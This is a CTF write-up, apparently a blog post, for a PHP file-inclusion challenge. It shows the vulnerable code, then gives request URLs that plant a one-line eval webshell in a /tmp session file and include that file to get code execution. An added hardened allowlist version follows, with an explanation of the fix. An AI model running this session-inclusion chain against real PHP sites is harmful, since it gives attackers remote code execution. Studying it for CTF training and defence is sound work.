safe_include

Challenge:

<?php 
show_source(__FILE__); 
@session_start();

ini_set('open_basedir', '/var/www/html/:/tmp/'); 

$sys = @$_SESSION['xxs'];
if (isset($_GET['xxs'])) {
    $sys = $_GET['xxs'];
}

@include $sys;

$_SESSION['xxs'] = $sys;

Approach:
Upload a one-line webshell -> use the file inclusion to include the session file that now holds the webshell. The first request's include of the payload string fails silently, but the script still writes the string into $_SESSION['xxs'], so it lands in the session file; /tmp is inside open_basedir, so the second request can include that file.
http://8dad57b3-3392-4210-91be-e8efc1dcd229.www.polarctf.com:8090/?xxs=<?php @eval($_REQUEST["a"]);phpinfo();?>
Session ID found (from the PHPSESSID cookie): 3lv6pensmgbb3g2tf7auvguaa2
Path: /tmp/sess_3lv6pensmgbb3g2tf7auvguaa2
http://8dad57b3-3392-4210-91be-e8efc1dcd229.www.polarctf.com:8090/?xxs=/tmp/sess_3lv6pensmgbb3g2tf7auvguaa2
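For comparison, the following is an added defensive example, not part of the original writeup or of the challenge code: a hardened replacement for the `@include $sys;` pattern above. The request parameter is treated as a key into a fixed allowlist rather than as a path, and only the validated key is written back into the session, so no attacker-controlled string can ever reach the session file or the include. The file names under pages/ and the helper resolve_page() are assumptions made up for this example.

```php
<?php
// Added example (not the challenge code): hardened version of the
// include logic. User input selects an allowlist entry; it is never
// used as a path and never stored raw in the session.
declare(strict_types=1);

session_start();

// Allowlist of short page names -> files that may be included.
// The files under pages/ are assumed to exist for this example.
const ALLOWED_PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

// Returns the allowlist key if the requested value matches exactly,
// or null for anything else (paths, "..", php:// wrappers,
// /tmp/sess_* names and so on are all rejected here).
function resolve_page(?string $requested): ?string
{
    if ($requested !== null && array_key_exists($requested, ALLOWED_PAGES)) {
        return $requested;
    }
    return null;
}

// Same precedence as the original: ?xxs= wins, then the session value.
$requested = $_GET['xxs'] ?? $_SESSION['xxs'] ?? null;
$page = resolve_page(is_string($requested) ? $requested : null);

if ($page === null) {
    // Rejected selectors are logged for detection; the raw value is
    // neither included nor persisted.
    error_log('safe_include: rejected page selector ' . var_export($requested, true));
    http_response_code(400);
    exit('invalid page');
}

// Only the validated allowlist key is stored, so a later request
// without ?xxs= still resolves through the allowlist.
$_SESSION['xxs'] = $page;
include ALLOWED_PAGES[$page];
```

Two points follow from the writeup itself: open_basedir was not a mitigation here, because /tmp (where PHP stores sess_* files by default) is inside the allowed list, and the session store became an include target only because the script saved an unvalidated string into it. Validating the selector before both the include and the session write removes both halves of the chain.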

posted @ 2025-05-08 11:41  lethe311